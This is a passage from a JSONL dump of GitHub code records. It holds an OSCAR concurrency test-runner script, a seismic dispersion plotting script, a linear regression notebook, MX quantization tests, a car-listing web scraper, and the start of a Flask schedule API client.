{"api_name": "numpy.newaxis", "line_number": 198, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path", "line_number": 205, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 206, "usage_type": "call"}, {"api_name": "resnet.resnet50", "line_number": 215, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 220, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 224, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 224, "usage_type": "name"}, {"api_name": "torch.chunk", "line_number": 232, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 233, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 247, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 247, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 260, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 262, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 262, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 262, "usage_type": "call"}, {"api_name": "torch.nn.init.kaiming_normal_", "line_number": 264, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 264, "usage_type": "name"}, {"api_name": "torch.nn.init.orthogonal_", "line_number": 266, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 266, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 266, "usage_type": "call"}, {"api_name": "torch.nn.init.constant_", "line_number": 272, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 272, "usage_type": "name"}, {"api_name": "time.time", "line_number": 283, "usage_type": "call"}, {"api_name": "time.time", "line_number": 286, "usage_type": "call"}, {"api_name": "random.random", "line_number": 371, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 378, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 379, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 394, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 400, "usage_type": "call"}]}
+{"seq_id": "74971681767", "text": "import argparse\n\n# Create parser for reading program arguments\nimport os\nimport shutil\nimport subprocess\nimport jellyfish as jf\nimport numpy\nimport numpy as np\nimport time\nfrom tqdm import tqdm\n\n\n# Convert a string to unicode\ndef to_unicode(code: int):\n return chr(int(str(code).zfill(8), 16))\n\n\ndef flatten_results_map(results_map):\n total = \"\"\n for key in results_map.keys():\n total += f\"({key},{round(results_map[key], 4)})\"\n return total\n\n\nargparser = argparse.ArgumentParser(\n prog='testscript',\n description='Automate OSCAR\\'s noise injection routine.',\n epilog='Run with argument -h for help.'\n)\n\nDISTANCE_ALGS = {\n 0: \"Levenshtein\",\n 1: \"Damerau-Levenshtein\",\n 2: \"Jaro\",\n 3: \"Jaro-Wrinkler\",\n 4: \"Hamming\",\n}\n\nargparser.add_argument('program_dir', help='location of program to run.')\nargparser.add_argument('executable', help='Name of program\\'s main class to run or jar file name.')\nargparser.add_argument('program_args', type=str, help='Arguments to be passed to program.')\n\nargparser.add_argument('-c', '--count', default=\"30\", type=str,\n help='Number of times to run program (comma separated).')\nargparser.add_argument('-da', '--distance_algorithm', default=\"0\", type=int,\n help=f'Distance algorithm: {DISTANCE_ALGS}.')\nargparser.add_argument('-j', '--jar', action='store_true', help='Run program as a jar.')\nargparser.add_argument('-dt', '--disable_thread_ids', action='store_true', help='Disable thread ID parsing.')\nargparser.add_argument('-utl', '--unique_trace_locations', action='store_true',\n help='Enable unique ids for repeated trace locations.')\nargparser.add_argument('-uti', '--unordered_thread_ids', action='store_true', help='Maintain original thread ID order.')\nargparser.add_argument('-dc', '--disable_coverage', action='store_true', help='Disable coverage analysis.')\nargparser.add_argument('-di', '--disable_interleaving', action='store_true', help='Disable interleaving analysis.')\nargparser.add_argument('-of', '--output_flags', type=str, help='Flags which will be checked in program output.')\n\nargv = argparser.parse_args()\n\n# Check distance alg valid\nif argv.distance_algorithm < 0 or argv.distance_algorithm > len(DISTANCE_ALGS) - 1:\n print(f'Invalid distance algorithm.')\n exit(1)\n\n# Check if file exists\nif not os.path.isdir(argv.program_dir):\n print(f'Folder {argv.program_dir} not found')\n exit(1)\n\nos.chdir(argv.program_dir)\n\n# Remove old generated files\nif os.path.isdir('oscar_output'):\n shutil.rmtree('oscar_output')\n\n###############################################################################################################\n\n# Save runtimes\nruntimes = []\n\nrun_counts = []\nfor rc in str(argv.count).split(\",\"):\n run_counts.append(int(rc))\n\nruns = run_counts[len(run_counts) - 1]\n\nprint(f'Running program {argv.count} times')\n\nFLAGS = str(argv.output_flags).split(\",\")\nflags_detected = {}\n\n# Run program x times\nfor i in tqdm(range(0, runs), desc=\"Variable Args\"):\n start_time = time.time_ns() / 1_000_000\n\n if not argv.jar:\n result = subprocess.run(\n f'java {argv.executable} {argv.program_args}',\n shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n else:\n result = subprocess.run(\n f'java -jar {argv.executable} {argv.program_args}',\n shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n\n if result.returncode != 0:\n print(result.stderr.decode('utf-8'))\n print(result.stdout.decode('utf-8'))\n\n # Check the output for flags\n output = result.stdout.decode('utf-8')\n\n # Parse line by line to check for flags\n for line in output.split(\"\\n\"):\n for flag in FLAGS:\n if flag in line:\n if line in flags_detected:\n flags_detected[line] = flags_detected[line] + 1\n else:\n flags_detected[line] = 1\n break\n\n for rc in str(argv.count).split(\",\"):\n run_counts.append(int(rc))\n\n runtimes.append(time.time_ns() / 1_000_000 - start_time)\n\nprint(f'Finished running. Analyzing files.')\n\n###############################################################################################################\n\n\n###############################################################################################################\n\nprint()\nprint(\"Results:\")\nprint(f'\\tAverage runtime (ms): {round(np.average(runtimes), 0)}')\n\nfor flag in flags_detected:\n print(f'\\tDetected flag_-_-{flag}-_-_{flags_detected[flag]}')\n\nif not argv.disable_coverage:\n # Try to analyze created files\n os.chdir('oscar_output')\n files = os.listdir('.')\n\n location_ids = {}\n interleavings = []\n trace_pairs = {}\n\n for file in files:\n content = open(file, 'r') # .read()\n thread_ids = []\n trace_pairs_count = {}\n\n interleaving = ''\n\n # Get all thread ids for ordering\n for line in content:\n thread_id = int(line.split(' ')[0].strip())\n if thread_id not in thread_ids:\n thread_ids.append(thread_id)\n\n # Check if thread ids should maintain order when mapped\n if argv.unordered_thread_ids:\n thread_ids = numpy.sort(thread_ids)\n\n # Map thread ids\n mapped_thread_ids = {}\n for i in range(0, len(thread_ids)):\n mapped_thread_ids[thread_ids[i]] = to_unicode(i)\n\n # Parse normally\n content = open(file, 'r')\n\n for line in content:\n thread_id = mapped_thread_ids[int(line.split(' ')[0].strip())]\n\n # Make the interleaving id value start from 0\n location_id = line.split(' ')[1].strip()\n if location_id not in location_ids:\n location_ids[location_id] = to_unicode(len(location_ids) + len(thread_ids))\n location_id = location_ids[location_id]\n\n # Append content with or without thread id\n trace_pair = location_id\n if not argv.disable_thread_ids:\n trace_pair = f'{thread_id}{trace_pair}'\n\n # Check if this interleaving pair is duplicate and needs new assigned id\n if argv.unique_trace_locations:\n if trace_pair not in trace_pairs_count:\n trace_pairs_count[trace_pair] = 0\n trace_pairs_count[trace_pair] += 1\n\n trace_pair = f'{trace_pairs_count[trace_pair]}_{trace_pair}'\n\n # Transform interleaving pair representation in single mapped unicode\n if trace_pair not in trace_pairs:\n trace_pairs[trace_pair] = to_unicode(len(trace_pairs))\n\n interleaving += trace_pairs[trace_pair]\n\n interleavings.append(interleaving)\n\n # Parse interleavings\n avg_dist_runs = {}\n std_dev_runs = {}\n uniq_interleavings_runs = {}\n avg_cluster_size = {}\n\n for rc in run_counts:\n interleavings_split = interleavings[0:rc]\n uniq_interleavings_runs[rc] = len(set(interleavings_split))\n\n clusters = {}\n # Calculate avg cluster size\n for interleaving in interleavings_split:\n if interleaving not in clusters:\n clusters[interleaving] = 1\n else:\n clusters[interleaving] += 1\n\n avg_cluster_size[rc] = np.average(list(clusters.values()))\n\n # For regular pairs\n interleaving_dists = []\n interleaving_dist = 0\n\n # Calculate average ratio\n if not argv.disable_coverage:\n for x in range(0, len(interleavings_split) - 1):\n for y in range(x + 1, len(interleavings_split)):\n ix = interleavings_split[x]\n iy = interleavings_split[y]\n\n # Levenshtein\n if argv.distance_algorithm == 0:\n interleaving_dist = jf.levenshtein_distance(ix, iy)\n\n # Damerau-Levenshtein\n if argv.distance_algorithm == 1:\n interleaving_dist = jf.damerau_levenshtein_distance(ix, iy)\n\n # Jaro\n if argv.distance_algorithm == 2:\n interleaving_dist = jf.jaro_similarity(ix, iy)\n\n # Jaro-Wrinkler\n if argv.distance_algorithm == 3:\n interleaving_dist = jf.jaro_winkler_similarity(ix, iy)\n\n # Hamming\n if argv.distance_algorithm == 4:\n interleaving_dist = jf.hamming_distance(ix, iy)\n\n interleaving_dists.append(interleaving_dist)\n else:\n interleaving_dists.append(1)\n\n avg_dist_runs[rc] = round(np.average(interleaving_dists), 4)\n std_dev_runs[rc] = round(float(np.std(interleaving_dists)), 4)\n\n distance_alg = DISTANCE_ALGS[argv.distance_algorithm]\n print(f'\\tUnique interleavings: {flatten_results_map(uniq_interleavings_runs)}')\n print(f'\\tAverage {distance_alg} distance: {flatten_results_map(avg_dist_runs)}')\n print(f'\\t{distance_alg} distance standard deviation: {flatten_results_map(std_dev_runs)}')\n print(f'\\tAverage Cluster Size: {flatten_results_map(avg_cluster_size)}')\n", "repo_name": "filipedeluna/oscar", "sub_path": "py_scripts/testscript/testscript.py", "file_name": "testscript.py", "file_ext": "py", "file_size_in_byte": 9280, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 73, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 92, "usage_type": "call"}, {"api_name": "time.time_ns", "line_number": 93, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 96, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 98, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 101, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 103, "usage_type": "attribute"}, {"api_name": "time.time_ns", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 137, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 144, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 224, "usage_type": "call"}, {"api_name": "jellyfish.levenshtein_distance", "line_number": 239, "usage_type": "call"}, {"api_name": "jellyfish.damerau_levenshtein_distance", "line_number": 243, "usage_type": "call"}, {"api_name": "jellyfish.jaro_similarity", "line_number": 247, "usage_type": "call"}, {"api_name": "jellyfish.jaro_winkler_similarity", "line_number": 251, "usage_type": "call"}, {"api_name": "jellyfish.hamming_distance", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 262, "usage_type": "call"}]}
+{"seq_id": "28213444995", "text": "import os\nimport argparse\n\nimport numpy\nimport matplotlib.pyplot as P\n\nfrom scipy.special import jacobi\n\ndef loaddispersion(fname):\n\n f = open(fname, 'r')\n lines = f.readlines()\n\n slon, slat, dlon, dlat, distkm = map(float, lines[0].split())\n freq, count, acsn, csn, N = map(float, lines[1].split())\n\n f, r, i, ncfr, ncfi = zip(*map(lambda x: map(float, x.split()), lines[2:]))\n\n spec = numpy.array(r) + numpy.array(i)*1.0j\n ncf = numpy.array(ncfr) + numpy.array(ncfi)*1.0j\n return (slon, slat, dlon, dlat, distkm, int(count)), numpy.array(f), freq, acsn, csn, spec, ncf\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n \n parser.add_argument('-f', '--fits', type = str, required = True, help = 'Fits base path')\n\n parser.add_argument('-d', '--data', type = str, default = '../example_data', help = 'Data base path')\n\n parser.add_argument('--width', type = float, default = 8.0, help = 'Figure width')\n parser.add_argument('--height', type = float, default = 3.0, help = 'Figure height')\n \n args = parser.parse_args()\n\n if os.access(os.path.join(args.fits, 'opt.pred'), os.R_OK):\n rayleighpred = numpy.loadtxt(os.path.join(args.fits, 'opt.pred'))\n elif os.access(os.path.join(args.fits, 'opt.pred-rayleigh'), os.R_OK):\n rayleighpred = numpy.loadtxt(os.path.join(args.fits, 'opt.pred-rayleigh'))\n else:\n raise Exception('No predictions file %s found' % os.path.join(args.fits, 'opt.pred'))\n\n stationpair = '_'.join(os.path.basename(args.fits.rstrip('/')).split('_')[1:3])\n\n rayleighdata = os.path.join(args.data, 'RayleighResponse/dispersion_%s.txt' % stationpair)\n\n (_, _, _, _, distkm, _), f, sample_rate, rayleigh_acsn, rayleigh_csn, rayleigh_spec, rayleigh_ncf = loaddispersion(rayleighdata)\n\n figB, bx = P.subplots()\n figB.set_size_inches((args.width, args.height))\n figB.set_tight_layout(True)\n\n #\n # Modulated Bessel is column 5, Raw Bessel is column 3, Envelope 4\n #\n colindex = 5\n #colindex = 3\n\n indices = numpy.where(rayleighpred[:,1] > 0.0)[0]\n\n bx.set_title('Rayleigh')\n bx.plot(rayleighpred[indices,0], rayleighpred[indices,colindex], 'r-', linewidth = 1, zorder = 100)\n bx.plot(f, numpy.real(rayleigh_ncf), linestyle = 'solid', color = 'grey', linewidth = 2, zorder = 50)\n\n bx.set_xlim(0, 0.4)\n\n bx.set_xlabel('Frequency (Hz)')\n\n P.show()\n", "repo_name": "rhyshawkins/AkiEstimate", "sub_path": "tutorial/scripts/plot_bessel_result_rayleigh.py", "file_name": "plot_bessel_result_rayleigh.py", "file_ext": "py", "file_size_in_byte": 2401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "os.access", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.R_OK", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.loadtxt", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.access", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.R_OK", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.loadtxt", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}]}
+{"seq_id": "12441036076", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# # Tanya Aggarwal\n# \n# # GRIP JUNE'22\n\n# # Prediction of student's study hours by linear regression\n# \n\n# # LINEAR REGRESSION:- \n# Linear regression analysis is used to predict the value of a variable based on the value of another variable. The variable you want to predict is called the dependent variable. The variable you are using to predict the other variable's value is called the independent variable.\n# \n# #simple linear regression:- In this task we will predict the percentage of marks that a student is expected to score based upon the number of hours they studies.\n# \n# As only two variables are involved i.e 1 dependent and 1 independent variable ,this is Simple linear regresion\n# \n# \n\n# In[2]:\n\n\n#importing Libraries\nimport pandas as pd #for manipulationg and analyse the data\nimport numpy as np #for numerical data\nimport matplotlib.pyplot as plt #for plotting the data\n#%matplotlib inline # for inline plotting(below the commands)\n\n\n# In[3]:\n\n\n#Importing Data\nurl='https://raw.githubusercontent.com/AdiPersonalWorks/Random/master/student_scores%20-%20student_scores.csv'\ndf1=pd.read_csv(url) #to read the data \nprint(\"Data imported successfully\")\nprint(df1)\n\n\n# In[4]:\n\n\n#if we want to print the limited values\ndf1.head(2) #to get upper values\ndf1.tail(2) #to get below values\n\n\n# In[5]:\n\n\n#Plotting the distribution of scores\ndf1.plot(x='Hours', y='Scores',style='o') #ploptting(we can change style *,1)\nplt.title('Hours vs Percentage') #title of graph\nplt.xlabel('Hours Studied') #label x axis\nplt.ylabel('Percentage Score') #label y axis\nplt.show()\n\n\n# In[6]:\n\n\n#As we can see the above graph, we can conclude that as hours studied increases ,percentafe increases. So, we can say that \n#there's a positive linear relation between two variables\n\n\n# # Preparing the data\n\n# In[7]:\n\n\n#Step-1:-In the next step we're going to divide data into \"attributes\"(inputs) and\"labels\"(Outputs)\n#Independent and Deoendent features\nx=df1.iloc[:,:-1].values #iloc() function enables us to select a particular cell of the dataset\n#print(x)\ny=df1.iloc[:,-1].values \nprint(y)\n\n\n# In[9]:\n\n\n#step 2-Split the data into training and testing sets by Using Scikit -learn's built in train_test_split()method\n# train_test_split is a function in Sklearn model selection for splitting data arrays into two subsets:\n#for training data and for testing data. With this function, you don't need to divide the dataset manually.\n#By default, Sklearn train_test_split will make random partitions for the two subsets\n\nfrom sklearn.model_selection import train_test_split\nx_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2,random_state=0) #,test_size=0.2=20% for testing\n\n\n# # Training the Algorithm\n# \n\n# In[10]:\n\n\n#step-3:- Train the Algorithm\n\nfrom sklearn.linear_model import LinearRegression\nregressor=LinearRegression()\nregressor.fit(x_train,y_train)\nprint(\"Training Done\")\n\n\n# In[11]:\n\n\n#step 4:- Plotting the training line\nline = regressor.coef_*x+regressor.intercept_\n\n#Plotting the test data\nplt.scatter(x,y)\nplt.plot(x,line);\nplt.show()\n\n\n# # Prediction\n\n# In[12]:\n\n\nprint(x_test) #testing data in hours\ny_pred=regressor.predict(x_test) #predicting the scores\nprint(y_pred)\n\n\n# In[13]:\n\n\n#Comparing Actual Vs prediction\ndf2=pd.DataFrame({'Actual': y_test,'Predicted': y_pred})\ndf2\n\n\n# In[14]:\n\n\n#Checking own data\nhours=9.25\nown_pred=regressor.predict([[hours]])\nprint('Predicted score if student study 9.25 hours/day')\nprint('No. of hours={}'.format(hours))\nprint('Predicted Score={}'.format(own_pred[0]))\n\n\n# In[15]:\n\n\nfrom sklearn import metrics\nprint('Mean Absolute Error:',metrics.mean_absolute_error(y_test,y_pred))\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "tanya99aggarwal/The-Sparks-Foundation-Internship", "sub_path": "GRIPJUNE'22 (Task -1).py", "file_name": "GRIPJUNE'22 (Task -1).py", "file_ext": "py", "file_size_in_byte": 3895, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 131, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_absolute_error", "line_number": 150, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 150, "usage_type": "name"}]}
+{"seq_id": "72077476647", "text": "import pytest\nimport torch\nimport numpy as np\nimport sys\n\nfrom .common_lib import (\n check_diff,\n check_diff_quantize,\n all_encodings\n)\n\nfrom mx.formats import _get_format_params\nfrom mx.mx_ops import _quantize_mx\n\nnp.random.seed(0xd10)\n\nDEVICE__CUSTOM_CUDA = [\n (\"cpu\", False),\n (\"cpu\", True),\n (\"cuda\", True),\n]\n\nELEM_FMTS = [\n (\"fp8_e5m2\"),\n (\"fp8_e4m3\"),\n (\"fp6_e3m2\"),\n (\"fp6_e2m3\"),\n (\"fp4_e2m1\"),\n (\"int4\"),\n]\n\n\n@pytest.mark.parametrize(\"scale_bits\", (8,5))\n@pytest.mark.parametrize(\"elem_format\", ELEM_FMTS)\n@pytest.mark.parametrize(\"block_size\", (8, 9, 64))\n@pytest.mark.parametrize(\"round\", ('nearest', 'floor', 'even'))\n@pytest.mark.parametrize(\"flush_fp32_subnorms\", (False,True))\n@pytest.mark.parametrize(\"device, custom_cuda\", DEVICE__CUSTOM_CUDA)\ndef test_mx_encoding(scale_bits, elem_format, block_size, round,\n flush_fp32_subnorms, device, custom_cuda):\n\n x1 = all_encodings(8, 9, device=\"cpu\")\n x2 = x1.clone().detach().to(device)\n\n y1 = _quantize_mx(x1, scale_bits, elem_format,\n block_size=block_size,\n axes=[-1],\n round=round,\n flush_fp32_subnorms=flush_fp32_subnorms,\n custom_cuda=False)\n\n\n y2 = _quantize_mx(x2, scale_bits, elem_format,\n block_size=block_size,\n axes=[-1],\n round=round,\n flush_fp32_subnorms=flush_fp32_subnorms,\n custom_cuda=custom_cuda)\n\n check_diff_quantize(x1, y1, y2)\n", "repo_name": "microsoft/microxcaling", "sub_path": "mx/tests/test_quantize_mx.py", "file_name": "test_quantize_mx.py", "file_ext": "py", "file_size_in_byte": 1607, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 52, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.random.seed", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 15, "usage_type": "attribute"}, {"api_name": "common_lib.all_encodings", "line_number": 42, "usage_type": "call"}, {"api_name": "mx.mx_ops._quantize_mx", "line_number": 45, "usage_type": "call"}, {"api_name": "mx.mx_ops._quantize_mx", "line_number": 53, "usage_type": "call"}, {"api_name": "common_lib.check_diff_quantize", "line_number": 60, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 33, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 34, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 35, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 36, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 37, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 38, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 38, "usage_type": "attribute"}]}
+{"seq_id": "15775683815", "text": "from bs4 import BeautifulSoup\nimport requests\n\nurl = 'https://www.mobile.bg/pcgi/mobile.cgi?act=3&slink=rxes3n&f1=1'\nhtml_sc = requests.get(url).text\nsoup = BeautifulSoup(html_sc, 'html5lib')\nmock_budget = 10000\n\ndef year_popper(string):\n basic_nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n for char in string:\n if char not in basic_nums:\n string = string.replace(char, '')\n return int(string[:4])\n\n\ndef price_popper(string):\n basic_nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n for char in string:\n if char not in basic_nums:\n string = string.replace(char, '') \n try:\n return int(string)\n except ValueError:\n return 0 \n\nnum_page = soup.find_all('a', class_ = 'pageNumbers')\npages_links = []\npages_links.append(url)\n\nfor index, i in enumerate(num_page):\n i = num_page[index]['href'] \n i = 'https:' + i\n if i not in pages_links:\n pages_links.append(i)\n\ncounter = 1\n\nfor link in pages_links:\n url = link\n page_url = requests.get(url).text\n page_soup = BeautifulSoup(page_url, 'html5lib')\n all_listings_per_page = page_soup.find_all('table', class_ = 'tablereset', style='width:660px; margin-bottom:0px; border-top:#008FC6 1px solid;')\n page_info = page_soup.find('span', class_ = 'pageNumbersInfo').text\n\n for listing in all_listings_per_page:\n urll = listing.find('td', class_ = 'valgtop', style = 'width:162px;height:40px;padding-left:4px').a\n linkk = 'https:' + urll['href']\n title = urll.text\n price = listing.find('td', class_ = 'algright valgtop', style = 'width:135px;height:40px;padding-left:4px').span.text\n production_year = listing.find('td', style = 'width:440px;height:50px;padding-left:4px').text\n\n price = price_popper(price)\n production_year = year_popper(production_year)\n print(\"Listing: \", counter, \" \", production_year, title, price)\n counter+=1\n\n # if E30\n if production_year in range(1982, 1995):\n if price <= mock_budget:\n with open('e30-list.md', 'a') as ff:\n ff.write(f\"Model: {title}\\n\")\n ff.write(f\"Year: {production_year}\\n\")\n ff.write(f\"URL: {linkk}\\n\")\n ff.write(f\"Price: {price}\\n\\n\\n\")\n else:\n with open('dream-car-list.md', 'a') as ff:\n ff.write(f\"Model: {title}\\n\")\n ff.write(f\"Year: {production_year}\\n\")\n ff.write(f\"URL: {linkk}\\n\")\n ff.write(f\"Price: {price}\\n\\n\\n\")\n # if E36 \n elif production_year in range(1996, 2000):\n if '316' in title or '1.6' in title:\n continue\n elif price <= mock_budget:\n with open('e36-list.md', 'a') as ff:\n ff.write(f\"Model: {title}\\n\")\n ff.write(f\"Year: {production_year}\\n\")\n ff.write(f\"URL: {linkk}\\n\")\n ff.write(f\"Price: {price}\\n\\n\\n\")\n else:\n continue\n", "repo_name": "jr94242/bs4-scraper", "sub_path": "mobile-e36.py", "file_name": "mobile-e36.py", "file_ext": "py", "file_size_in_byte": 3126, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 5, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 6, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "17858569692", "text": "import requests\nfrom werkzeug.wrappers import response\nfrom flask import session\nfrom . import Schedule_API_URL\n\n\nclass ScheduleClient:\n @staticmethod\n def get_schedules():\n #header = {'Authorization': session['user_api_key']}\n response = requests.get(Schedule_API_URL +\n '/api/schedule/all') #headers=header)\n return response.json()\n\n @staticmethod\n def create_schedule(form):\n #header = {'Authorization': session['user_api_key']}\n payload = {\n 'name': form.name.data,\n 'state': form.state.data,\n 'city': form.city.data,\n 'vaccination_cite': form.vaccination_cite.data,\n 'first_slot': form.first_slot.data,\n 'second_slot': form.second_slot.data,\n 'medical_condition': form.medical_condition.data,\n }\n\n response = requests.post(Schedule_API_URL + '/api/schedule/create',\n data=payload) #headers=header)\n return response.json()\n\n @staticmethod\n def get_schedule_from_session():\n default_schedule = {\n 'items': {}\n }\n return session.get('schedule', default_schedule)\n", "repo_name": "biallenchanuow/CSCI927", "sub_path": "vaccine/frontend/api/schedule_api.py", "file_name": "schedule_api.py", "file_ext": "py", "file_size_in_byte": 1211, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "werkzeug.wrappers.response", "line_number": 11, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, 